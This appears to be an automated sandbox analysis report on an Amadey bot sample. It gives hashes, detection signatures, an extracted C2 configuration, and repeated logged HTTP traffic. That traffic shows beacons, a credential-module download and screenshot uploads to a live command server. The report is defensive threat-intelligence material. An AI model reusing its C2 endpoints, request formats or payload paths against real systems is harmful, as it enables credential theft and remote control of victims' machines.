Windows Analysis Report
yIF7nMz573.exe

Overview

General Information

Sample Name: yIF7nMz573.exe
Analysis ID: 652395
MD5: dce2a8f4ab60879898a21ab451cad63f
SHA1: c889640843424e5ee1c6a7e31d25e3fa510b846b
SHA256: 2be50564951116ca5ac96158abdb936b6d5bd35794330371131f4117223cdd26
Tags: Amadeyexe

Detection

Amadey
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Detected unpacking (overwrites its own PE header)
Yara detected Amadey bot
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Machine Learning detection for sample
Contains functionality to inject code into remote processes
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to record screenshots
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Abnormal high CPU Usage
Creates a DirectInput object (often for capturing keystrokes)
Drops PE files
Contains functionality to read the PEB
Uses reg.exe to modify the Windows registry
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection

Source: yIF7nMz573.exe Virustotal: Detection: 36%
Source: yIF7nMz573.exe ReversingLabs: Detection: 46%
Source: http://185.215.113.15/Lkb2dxj3/cred.dll Avira URL Cloud: Label: malware
Source: http://185.215.113.15/Lkb2dxj3/index.php?scr=1 Avira URL Cloud: Label: malware
Source: http://185.215.113.15/Lkb2dxj3/index.php Avira URL Cloud: Label: malware
Source: 185.215.113.15/Lkb2dxj3/index.php Avira URL Cloud: Label: malware
Source: http://185.215.113.15/Lkb2dxj3/cred.dll Virustotal: Detection: 10%
Source: http://185.215.113.15/Lkb2dxj3/index.php?scr=1 Virustotal: Detection: 16%
Source: http://185.215.113.15/Lkb2dxj3/index.php Virustotal: Detection: 8%
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe ReversingLabs: Detection: 46%
Source: yIF7nMz573.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Joe Sandbox ML: detected
Source: 10.2.bguuwe.exe.ca0e67.1.raw.unpack Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.15/Lkb2dxj3/index.php", "Version": "3.21"}

Compliance

Source: C:\Users\user\Desktop\yIF7nMz573.exe Unpacked PE file: 0.2.yIF7nMz573.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Unpacked PE file: 10.2.bguuwe.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Unpacked PE file: 19.2.bguuwe.exe.400000.0.unpack
Source: yIF7nMz573.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\yIF7nMz573.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: Binary string: 4C:\muga-banel\tuf3_karas\xeyuno\kuzonubo\hezu\1\tex49.pdbhQE source: yIF7nMz573.exe, bguuwe.exe.0.dr
Source: Binary string: D:\Mktmp\NL1\Release\NL1.pdb source: bguuwe.exe, bguuwe.exe, 0000000A.00000003.309573312.0000000002680000.00000004.00001000.00020000.00000000.sdmp, bguuwe.exe, 0000000A.00000002.310851152.0000000000400000.00000040.00000001.01000000.00000004.sdmp, bguuwe.exe, 00000013.00000003.436338971.0000000001010000.00000004.00001000.00020000.00000000.sdmp, bguuwe.exe, 00000013.00000002.437486522.0000000000400000.00000040.00000001.01000000.00000004.sdmp
Source: Binary string: C:\muga-banel\tuf3_karas\xeyuno\kuzonubo\hezu\1\tex49.pdb source: yIF7nMz573.exe, bguuwe.exe.0.dr
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_004244D2 FindFirstFileExW, 0_2_004244D2
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Code function: 10_2_004244D2 FindFirstFileExW, 10_2_004244D2

Networking

Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49742 -> 185.215.113.15:80
Source: Malware configuration extractor URLs: 185.215.113.15/Lkb2dxj3/index.php
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: global traffic HTTP traffic detected:
  POST /Lkb2dxj3/index.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  Host: 185.215.113.15
  Content-Length: 87
  Cache-Control: no-cache
  Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30
  Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected:
  GET /Lkb2dxj3/cred.dll HTTP/1.1
  Host: 185.215.113.15
Source: global traffic HTTP traffic detected:
  POST /Lkb2dxj3/index.php?scr=1 HTTP/1.1
  Content-Type: multipart/form-data; boundary=----3071f00e42adff16a6518745df4c3290
  Host: 185.215.113.15
  Content-Length: 95417
  Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----d6afcb968497838ee04b7f9293290ab5Host: 185.215.113.15Content-Length: 100265Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----de41c2db1b9fd139ced25e2d3c1377b7Host: 185.215.113.15Content-Length: 97468Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----3823d6dafa9723c13eb7a8bc02000020Host: 185.215.113.15Content-Length: 95420Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----73aae0f3452507fb65ee4a8da04d958aHost: 185.215.113.15Content-Length: 95763Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----3823d6dafa9723c13eb7a8bc02000020Host: 185.215.113.15Content-Length: 95420Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----3823d6dafa9723c13eb7a8bc02000020
Host: 185.215.113.15
Content-Length: 95420
Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----902c296e891d8e76557eb09453b58741
Host: 185.215.113.15
Content-Length: 99573
Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----d51656dda67009af4d34db106d3e2a75
Host: 185.215.113.15
Content-Length: 95758
Cache-Control: no-cache
Source: Joe Sandbox View IP Address: 185.215.113.15 185.215.113.15
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
Date: Sun, 26 Jun 2022 07:46:53 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 276
Content-Type: text/html; charset=iso-8859-1
